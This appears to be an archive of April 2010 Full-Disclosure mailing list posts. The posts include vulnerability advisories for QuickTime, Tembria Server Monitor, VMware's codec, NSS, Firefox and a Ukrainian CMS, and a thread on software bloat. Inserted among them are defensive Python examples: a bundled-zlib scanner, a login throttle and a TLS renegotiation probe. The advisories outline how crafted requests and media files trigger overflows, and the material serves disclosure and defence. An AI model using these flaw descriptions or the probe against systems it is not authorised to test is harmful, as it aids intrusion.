I got Safari to test websites I develop. Apple seems to think that during a recommended/critical Safari update, I should be installing iTunes. Oh, and surprise, with iTunes you get a couple of Apple Sync'ing services, not to mention some hidden server.

It isn't *just* Apple, it's Linux, Microsoft and just about any other company. Microsoft forces you to get Desktop search (and turn on the indexing service, which has its own set of exploits and slows the computer down *a lot*).

Regards,
Chris.

On Fri, Apr 9, 2010 at 4:12 PM, wrote:
> On Fri, 09 Apr 2010 15:49:58 +0200, "Jan G.B." said:
>
> > And where's the point in reporting several projects that use a -say-
> > library which has a reported problem? (I mean, you've sent quite the
> > same mail with a different software to bugtraq, today.)
>
> A few years ago, a rather nasty vulnerability was found in the zlib
> compression library. We then saw a whole raft of advisories for things
> that included the zlib libraries, because often the package shipped with
> a private copy of zlib so patching the system zlib did *not* actually
> fix the problem for the zlib-using package.
>
> And quite frankly, if it's a very low-level package, the average system
> admin may not even *realize* that his very important MobyFoo package that
> he remembers uses something called FooBar (or at least he remembers MobyFoo
> wanting FooBar when he installed it 3 years ago), and the year after that,
> FooBar started using QuuxBaz, which (a) the sysadmin didn't even know was
> installed on his box, and (b) has a security hole.
>
> You think I'm kidding? Even *after* some vigorous pruning, my Fedora laptop
> has 1,782 RPMs installed - back around Red Hat 9 it was more like 600. Lotta
> software bloat going on, and most sysadmins don't have the combo of time and
> clue to fight it. For instance, it's a losing battle to keep Bluetooth
> software off this laptop, even though it doesn't *have* Bluetooth hardware,
> because more and more packages link in Bluetooth "in case you have it".
>
> And not one of those package developers understands the concept of a linker
> "weak reference". Argh.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
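Valdis's zlib point is the software-supply-chain problem in miniature: patching the system library fixes nothing for a package that carries its own copy, and the package manager's dependency list will not tell you which ones do. The scanner below is an added example, not code from anyone in this thread. It relies on the copyright strings that zlib's inflate.c and deflate.c compile into every binary that links them (" inflate 1.2.3 Copyright 1995-2005 Mark Adler " and the deflate equivalent), so a byte-level search finds statically linked or vendored copies regardless of how they were packaged. The MIN_OK threshold is an assumed policy value for the example, not a version taken from the post.

```python
"""Find privately bundled copies of zlib by their embedded copyright strings.

Added example for the thread above, not code from the original post.
"""
import re
import sys
from pathlib import Path
from typing import Iterator, List, Tuple

# zlib's inflate.c and deflate.c embed these strings in every binary that links them.
ZLIB_MARK = re.compile(rb"(inflate|deflate) (\d+(?:\.\d+)+) Copyright ")
MIN_OK = (1, 2, 3)  # assumed policy threshold for this example, not a value from the post


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.2.11' -> (1, 2, 11); tuples compare component by component."""
    return tuple(int(part) for part in text.split("."))


def find_zlib_copies(data: bytes) -> List[Tuple[str, str]]:
    """Return distinct (routine, version) pairs for every zlib marker in a blob."""
    found: List[Tuple[str, str]] = []
    for m in ZLIB_MARK.finditer(data):
        pair = (m.group(1).decode(), m.group(2).decode())
        if pair not in found:
            found.append(pair)
    return found


def outdated_copies(data: bytes, min_ok: Tuple[int, ...] = MIN_OK) -> List[str]:
    """Versions of bundled zlib in the blob that are older than min_ok."""
    return sorted({ver for _, ver in find_zlib_copies(data) if parse_version(ver) < min_ok})


def scan_tree(root: Path, min_ok: Tuple[int, ...] = MIN_OK) -> Iterator[Tuple[Path, List[str]]]:
    """Walk root and yield (file, versions) for every regular file carrying an outdated copy."""
    for path in root.rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue
        try:
            old = outdated_copies(path.read_bytes(), min_ok)
        except OSError:
            continue
        if old:
            yield path, old


# Constructed sample "binaries": one with a stale private zlib, one current.
SAMPLE_OLD = b"\x7fELF\x00junk inflate 1.2.2 Copyright 1995-2004 Mark Adler \x00more"
SAMPLE_NEW = b"MZ\x90\x00 deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly and Mark Adler \x00"

if __name__ == "__main__":
    for path, versions in scan_tree(Path(sys.argv[1] if len(sys.argv) > 1 else "/usr")):
        print(f"{path}: bundled zlib {', '.join(versions)}")
```

Run it against /usr (or a package's unpacked payload) after a zlib advisory; every hit is a binary that the system zlib update did not fix. The same approach works for any library that leaves a version string in its object code, which is most of them.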
Re: [Full-disclosure] Vulnerabilities in phpCOIN
Amen to that.

Everything seems to be delivered for installation and even increasingly with *each* update, carrying various "hitch hiker" applications... toolbars, trial software, etc. Sun Java updates installing toolbars, Adobe doing toolbars, even FoxIT installed some toolbars (even after I said no) with the last update. If not a toolbar, then a $...@#%$# "download manager". Adobe has one that insists on being installed (which had its own set of exploits already). Even Cisco's support site wants to install a 47-click java applet to get an IOS update these days.

I'd like to set the wayback machine for the non-web-2.0, straightforward command line days :-)

Jeff

-----Original Message-----
From: Christian Sciberras

I think Universities should rethink their Software Development courses...

Valdis has got a very strong point. Here's my own.

I got Safari to test websites I develop. Apple seems to think that during a recommended/critical Safari update, I should be installing iTunes. Oh, and surprise, with iTunes you get a couple of Apple Sync'ing services, not to mention some hidden server.

It isn't *just* Apple, it's Linux, Microsoft and just about any other company. Microsoft forces you to get Desktop search (and turn on the indexing service, which has its own set of exploits and slows the computer down *a lot*).
[Full-disclosure] ZDI-10-068: Apple QuickTime H.263 Array Index Parsing Remote Code Execution Vulnerability
ZDI-10-068: Apple QuickTime H.263 Array Index Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-068
April 9, 2010

-- CVE ID:
CVE-2010-0062

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9681. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required in that a target must open a malicious media file or visit a malicious page.

The specific flaw exists within the parsing of H.263 media files. The code within QuickTime trusts various values from MDAT structures and uses them during operations on heap memory. By crafting specific values the corruption can be leveraged to execute remote code under the context of the user running the application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4104

-- Disclosure Timeline:
2010-04-06 - Vulnerability reported to vendor
2010-04-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter: http://twitter.com/thezdi
Re: [Full-disclosure] Vulnerabilities in TAK cms
lol.

On Thu, Apr 8, 2010 at 4:30 PM, Benji wrote:
> nah, he'd be telling us how that was an easy way to find valid accounts.
>
> -Benji
>
> On Thu, Apr 8, 2010 at 6:30 PM, T Biehn wrote:
>>
>> If there were an account lockout after 5 tries would you be telling us
>> about how there was a DOS vector on the same software?
>>
>> -Travis
>>
>> On Mon, Apr 5, 2010 at 4:35 PM, MustLive wrote:
>> > Hello Full-Disclosure!
>> >
>> > I want to warn you about security vulnerabilities in TAK cms. It's a
>> > Ukrainian commercial CMS.
>> >
>> > -
>> > Advisory: Vulnerabilities in TAK cms
>> > -
>> > URL: http://websecurity.com.ua/4050/
>> > -
>> > Timeline:
>> > 04.02.2009 - found vulnerabilities.
>> > 30.09.2009 - informed owners of web sites where I found these
>> > vulnerabilities. Taking into account that I didn't find any contact data
>> > of the developer of TAK cms, I hope that the owners of that site informed
>> > him about these vulnerabilities. This is one of those cases with a
>> > commercial CMS where the developers didn't leave any contact data and
>> > there is no information about them on the Internet.
>> > 19.03.2010 - disclosed at my site.
>> > -
>> > Details:
>> >
>> > These are Insufficient Anti-automation and Brute Force vulnerabilities.
>> >
>> > Insufficient Anti-automation:
>> >
>> > http://site/about/contacts/
>> > http://site/register/getpassword/
>> >
>> > At these pages there is no protection from automated requests (captcha).
>> >
>> > Brute Force:
>> >
>> > http://site/auth/
>> > http://site/admin/
>> >
>> > In the login forms there is no protection from Brute Force attacks.
>> >
>> > Vulnerable are all versions of TAK cms.
>> >
>> > Best wishes & regards,
>> > MustLive
>> > Administrator of Websecurity web site
>> > http://websecurity.com.ua
>>
>> --
>> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da

--
FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
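The exchange above raises the two objections every "no brute-force protection" report runs into: lock the account after N failures and anyone can lock any user out, and a distinct "account locked" message tells an attacker which usernames exist. The throttle below is an added example, not code from any message in the thread and not TAK cms's code; it shows the usual way out: count failures per (client, account) in a sliding window, impose a growing, capped delay instead of a lock, tarpit a client that fails against many accounts, and return one identical failure response (with the same hashing cost) whether or not the account exists. The user table, the fixed salt and FakeClock are constructed for the example.

```python
"""Login throttling that neither locks accounts nor reveals which ones exist.

Added example for the thread above; not code from the original messages.
"""
import hashlib
import hmac
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict, Tuple

WINDOW = 600.0        # seconds over which failures are remembered
FREE_ATTEMPTS = 5     # failures per (client, account) before delays start
MAX_DELAY = 60.0      # cap on the delay imposed on one attempt, seconds
PER_IP_LIMIT = 50     # failures from one client against any accounts before it is tarpitted
PBKDF2_ROUNDS = 50_000  # constructed for the example; tune for the deployment


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_user(password: str, salt: bytes = b"\x01" * 16) -> Tuple[bytes, bytes]:
    """Constructed user record (salt, hash); real code draws the salt from os.urandom."""
    return salt, _hash(password, salt)


class LoginThrottle:
    def __init__(self, users: Dict[str, Tuple[bytes, bytes]],
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.users = users
        self.clock = clock
        self.by_pair: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)
        self.by_ip: Dict[str, Deque[float]] = defaultdict(deque)
        # Dummy credential so unknown usernames cost the same hash work as real ones.
        self._dummy = make_user("dummy", b"\x00" * 16)

    def _prune(self, q: Deque[float], now: float) -> None:
        while q and now - q[0] > WINDOW:
            q.popleft()

    def delay_for(self, ip: str, user: str) -> float:
        """Seconds the server should hold the response to this attempt."""
        now = self.clock()
        pair, per_ip = self.by_pair[(ip, user)], self.by_ip[ip]
        self._prune(pair, now)
        self._prune(per_ip, now)
        if len(per_ip) >= PER_IP_LIMIT:          # one client hammering many accounts
            return MAX_DELAY
        extra = len(pair) - FREE_ATTEMPTS
        return 0.0 if extra < 0 else min(MAX_DELAY, 2.0 ** extra)

    def login(self, ip: str, user: str, password: str) -> Tuple[bool, float]:
        """Return (ok, delay). The caller sleeps `delay` before answering; the
        failure text it sends is the same whether or not the account exists."""
        delay = self.delay_for(ip, user)
        salt, stored = self.users.get(user, self._dummy)
        computed = _hash(password, salt)          # always done, even for unknown users
        ok = user in self.users and hmac.compare_digest(computed, stored)
        if ok:
            self.by_pair[(ip, user)].clear()      # a real login resets that client's count
        else:
            now = self.clock()
            self.by_pair[(ip, user)].append(now)
            self.by_ip[ip].append(now)
        return ok, delay


class FakeClock:
    """Constructed clock so the sliding window can be exercised without sleeping."""
    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now
```

The legitimate user is slowed down after repeated failures but never refused, other clients of the same account are unaffected, and a request for a non-existent user gets exactly the answer a real user's first failure gets. A captcha after FREE_ATTEMPTS is a reasonable addition on top of this, not a replacement for it.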
[Full-disclosure] Vulnerability in Tembria Server Monitor
Hi,

Please find the advisory in attachment.

Regards,
Sébastien Duquette
Corelan Team

Advisory CORELAN-10-022
Reference : CVE-2010-1316
Disclosure date : April 8th, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-022

00 : Vulnerability information
Product : Tembria Server Monitor
Version : 5.6.0
Vendor : Don Leclair / tembria.com
URL : http://www.tembria.com/download/
Platform : Windows
Type of vulnerability : Stack overflow
Risk rating : Medium
Issue fixed in version : 5.6.1 (released April 8)
Vulnerability discovered by : Lincoln
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/

01 : Vendor description of software
From the vendor website: "Tembria Server Monitor continuously monitors your network for potential problems so you don't have to. Supporting popular Internet protocols, Tembria Server Monitor watches for specific conditions and notifies you if a problem is detected."

02 : Vulnerability details
The HTTP service is vulnerable to a buffer overflow, allowing a malicious person to trigger a remote Denial Of Service condition by sending a specially crafted GET, PUT, or HEAD request to the server. The application service then immediately stops and requires the user to restart the service. Remote code execution may be possible. No user intervention is required to trigger the overflow/DoS.

Corelan would like to mention that the software vendor was very cooperative and proactive with communication and addressing the issue in a timely manner.

03 : Author/Vendor communication
March 31 2010 : author contacted
March 31 2010 : author replies, asks for proof of concept
March 31 2010 : Corelan sends proof of concept
April 5 2010 : Corelan asks for update
April 5 2010 : author replies back with patched software
April 5 2010 : Corelan verifies issue fixed in new version
April 8 2010 : fixed version released
April 9 2010 : public disclosure

04 : PoC
Proof of concept is available at the following URL :
http://www.corelan.be:8800/wp-content/forum-file-uploads/admin1/exploits/corelan_lincoln_tembria.py_.txt
[Full-disclosure] [USN-927-1] NSS vulnerability
===
Ubuntu Security Notice USN-927-1
April 09, 2010
nss vulnerability
CVE-2009-3555
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 9.10:
  libnss3-1d  3.12.6-0ubuntu0.9.10.1

After a standard system upgrade you need to restart your session to effect the necessary changes.

Details follow:

Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds support for the new renegotiation extension and will use it when the server supports it.

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.diff.gz
  Size/MD5: 36589 0b0b4b8d1dd122093fa815d69efbc89e
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.dsc
  Size/MD5: 1651 a0117f537999a8c5a29dac921fe3db19
http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz
  Size/MD5: 5947630 da42596665f226de5eb3ecfc1ec57cd1

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5: 3235746 038ea8c22fc1adcec7c6eb94a2666e7f
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5: 1234192 6ce9b85ed07528c77d924d8949c85774
http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5: 263144 cb7c75294d9ce22ed463935759f8546a
http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_amd64.deb
  Size/MD5: 17752 041cb0b8d9ef5e7dbb4a7b6b21c68fed
http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 313120 9305a9fbe4473a5fbcb129052d3a9d5e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 3178260 f86edf83bfa1a693add3f9f9a5fce87d http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 1119650 7ea6f3113550c23ff2d786e8bb6826a9 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 260452 2be494403893cce2523e56003450381f http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5:17758 84b68d14e2edafa15c4d85251a234509 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 299734 78c46aca04aae9369ba47dbbbd7b4ebb lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 3216586 542551cab0ad5b7d02469995f0138483 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 1095640 673d9d626476508b78b1c01ec14da360 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 259386 22bac19ca5b1faee3374cfa4d71ee0f6 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5:17754 cf0945e1ee85107157e820fa4f1ee5c6 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 298426 25cb3017432736f8fe127efc2cef8235 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 3325392 71aa8238fa81e9eda6405450e9a15389 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 1206786 5b3f8a2c91c7c8a58055f2bdf3b47ee3 
http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 261718 e0f60fafda404bbcd749a1279bdd2601 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5:17758 ce3c85e4e6e53fff45bcbec8fac99ede http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 310922 acc562396e43692d342d0c44fe7e9131 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_sparc.deb Size/MD5: 2967738 84df47285cec6cdb1
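The "new renegotiation extension" the notice refers to is RFC 5746's renegotiation_info (extension type 0xff01), which a client can also signal with the TLS_EMPTY_RENEGOTIATION_INFO_SCSV cipher suite value 0x00ff. Whether a server has been fixed is therefore visible on the wire: a patched server answers a ClientHello that offers either with renegotiation_info in its ServerHello, an unpatched one does not. The code below is an added example, not Ubuntu's or NSS's code; it builds the ClientHello a probe would send and parses a ServerHello for the extension. The ServerHello bytes it is tested against are constructed in build_server_hello(), and only probe_server() touches a real network.

```python
"""Check a ServerHello for RFC 5746 secure renegotiation support.

Added example for the notice above; not code from Ubuntu, NSS or the original post.
"""
import os
import socket
import struct
from typing import List, Tuple

RENEG_INFO_EXT = 0xFF01   # renegotiation_info extension type (RFC 5746)
RENEG_SCSV = 0x00FF       # TLS_EMPTY_RENEGOTIATION_INFO_SCSV
TLS1_0 = b"\x03\x01"


def _handshake_record(msg_type: int, body: bytes) -> bytes:
    """Wrap a handshake body in its 4-byte handshake header and a TLS record."""
    hs = bytes([msg_type]) + struct.pack("!I", len(body))[1:] + body
    return b"\x16" + TLS1_0 + struct.pack("!H", len(hs)) + hs


def _reneg_info_ext() -> bytes:
    """renegotiation_info carrying an empty renegotiated_connection (initial handshake)."""
    return struct.pack("!HH", RENEG_INFO_EXT, 1) + b"\x00"


def build_client_hello(cipher_suites: List[int], offer_scsv: bool = True,
                       reneg_ext: bool = False) -> bytes:
    """ClientHello that signals RFC 5746 support via the SCSV and/or the extension."""
    suites = list(cipher_suites) + ([RENEG_SCSV] if offer_scsv else [])
    suite_bytes = b"".join(struct.pack("!H", s) for s in suites)
    ext = _reneg_info_ext() if reneg_ext else b""
    body = (TLS1_0 + os.urandom(32) + b"\x00"          # version, random, empty session id
            + struct.pack("!H", len(suite_bytes)) + suite_bytes
            + b"\x01\x00"                                # one compression method: null
            + (struct.pack("!H", len(ext)) + ext if ext else b""))
    return _handshake_record(0x01, body)


def build_server_hello(suite: int, with_reneg: bool) -> bytes:
    """Constructed ServerHello used to exercise the parser offline (random is zeroed)."""
    ext = _reneg_info_ext() if with_reneg else b""
    body = (TLS1_0 + b"\x00" * 32 + b"\x00" + struct.pack("!H", suite) + b"\x00"
            + (struct.pack("!H", len(ext)) + ext if ext else b""))
    return _handshake_record(0x02, body)


def parse_server_hello(record: bytes) -> Tuple[int, List[int]]:
    """Return (chosen cipher suite, [extension types]) from one ServerHello record."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + struct.unpack("!H", record[3:5])[0]]
    if not hs or hs[0] != 0x02:
        raise ValueError("not a ServerHello (alert or other handshake message)")
    p = 4 + 2 + 32                        # handshake header, version, random
    p += 1 + hs[p]                        # session id
    suite = struct.unpack("!H", hs[p:p + 2])[0]
    p += 2 + 1                            # cipher suite, compression method
    exts: List[int] = []
    if p < len(hs):                       # the extensions block is optional
        end = p + 2 + struct.unpack("!H", hs[p:p + 2])[0]
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack("!HH", hs[p:p + 4])
            exts.append(etype)
            p += 4 + elen
    return suite, exts


def supports_secure_renegotiation(server_hello: bytes) -> bool:
    return RENEG_INFO_EXT in parse_server_hello(server_hello)[1]


def probe_server(host: str, port: int = 443) -> bool:
    """Live check: send the ClientHello and inspect the first record that comes back."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_client_hello([0x002F, 0x0035]))   # AES128-SHA, AES256-SHA
        head = s.recv(5)
        need = struct.unpack("!H", head[3:5])[0]
        body = b""
        while len(body) < need:
            chunk = s.recv(need - len(body))
            if not chunk:
                break
            body += chunk
    return supports_secure_renegotiation(head + body)
```

A server that returns an alert instead of a ServerHello makes parse_server_hello() raise; treat that as "unknown", not as "unsupported". The client-side half of the fix, which is what this nss update delivers, is the mirror image: refuse to renegotiate with a server whose ServerHello lacked the extension.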
[Full-disclosure] [USN-921-1] Firefox 3.5 and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-921-1 April 09, 2010 firefox-3.5, xulrunner-1.9.1 vulnerabilities CVE-2010-0173, CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177, CVE-2010-0178, CVE-2010-0179, CVE-2010-0181, CVE-2010-0182 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: firefox-3.5 3.5.9+nobinonly-0ubuntu0.9.10.1 xulrunner-1.9.1 1.9.1.9+nobinonly-0ubuntu0.9.10.1 After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes. Details follow: Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered flaws in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0173, CVE-2010-0174) It was discovered that Firefox could be made to access previously freed memory. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0175, CVE-2010-0176, CVE-2010-0177) Paul Stone discovered that Firefox could be made to change a mouse click into a drag and drop event. If the user could be tricked into performing this action twice on a crafted website, an attacker could execute arbitrary JavaScript with chrome privileges. (CVE-2010-0178) It was discovered that the XMLHttpRequestSpy module as used by the Firebug add-on could be used to escalate privileges within the browser. If the user had the Firebug add-on installed and were tricked into viewing a malicious website, an attacker could potentially run arbitrary JavaScript. 
(CVE-2010-0179) Henry Sudhof discovered that an image tag could be used as a redirect to a mailto: URL to launch an external mail handler. (CVE-2010-0181) Wladimir Palant discovered that Firefox did not always perform security checks on XML content. An attacker could exploit this to bypass security policies to load certain resources. (CVE-2010-0182) Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.diff.gz Size/MD5: 129770 0665849c341bbaeb43dc853328434d74 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.dsc Size/MD5: 2595 b31a13643a6699a0669164e5c812e874 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly.orig.tar.gz Size/MD5: 45825322 bdb27480034e67db569e8b0f4fe180be http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.diff.gz Size/MD5:59497 700cd2dc3672792e073fa5dd2451a927 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.dsc Size/MD5: 2565 d6ac2e0d72309c2979a33e4e71c14971 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly.orig.tar.gz Size/MD5: 45124822 f3daad932b9fbf4b2fc33798e4c21e55 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73568 0f56708e218445e068269a9e1a9a6af6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73422 567aa3f3c16b4564739c4bd77e446d93 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73416 f401b03d7e3c7ba1d3dcd1fe591adef1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb 
Size/MD5:73416 eb00ecbb00c027b5f37fcb0e19f4909e http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73478 126936486b1bea1d490d6cc36b96acca http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73576 7212547851f9d203016dce0d233e8885 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73438 09052f4029acfb37574096c2b8f8e325 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/
[Full-disclosure] iDefense Security Advisory 04.09.10: VMware VMnc Codec Heap Overflow Vulnerability
iDefense Security Advisory 04.09.10
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 09, 2010

I. BACKGROUND

VMware Inc. markets several virtualization products such as ACE, Player, Server, and Workstation. These products include a video coder-decoder (codec) called 'vmnc.dll', or VMware Movie Decoder, that is registered on the host machine at installation time. This codec will be used whenever video streams of the 'VMnc' type, such as those produced when using VMware Workstation's "Capture Movie" feature, are encountered. For more information, refer to the links shown below.

http://en.wikipedia.org/wiki/Codec
http://www.vmware.com/support/ws5/doc/ws_running_capture.html

II. DESCRIPTION

Remote exploitation of a heap-based buffer overflow vulnerability in VMware Inc.'s movie decoder allows attackers to execute arbitrary code.

This vulnerability exists due to a lack of input validation when processing certain specially crafted Audio-Video Interleave (AVI) files. During processing, a heap buffer will be allocated based on one part of the AVI file data. However, the amount of data copied into that buffer is calculated based on a different part of the file. This leads to an exploitable heap-based buffer overflow condition.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user running an application utilizing the vulnerable codec. In order to reach the vulnerable code, a targeted user must play a specially crafted AVI media file. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites.

IV. DETECTION

iDefense confirmed the existence of this vulnerability using the following software.

vmnc.dll version 6.5.2.7026 from Workstation 6.5.2
vmnc.dll version 6.5.3. from Workstation 6.5.3

A full list of affected VMware products can be found in Security Advisory VMSA-2010-0007.

V. WORKAROUND

Disabling the 'VMnc' codec will prevent exploitation. In order to do so, import the 'disable-vmnc-codec.reg' registry file as follows.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32]
"VIDC.VMnc"=-

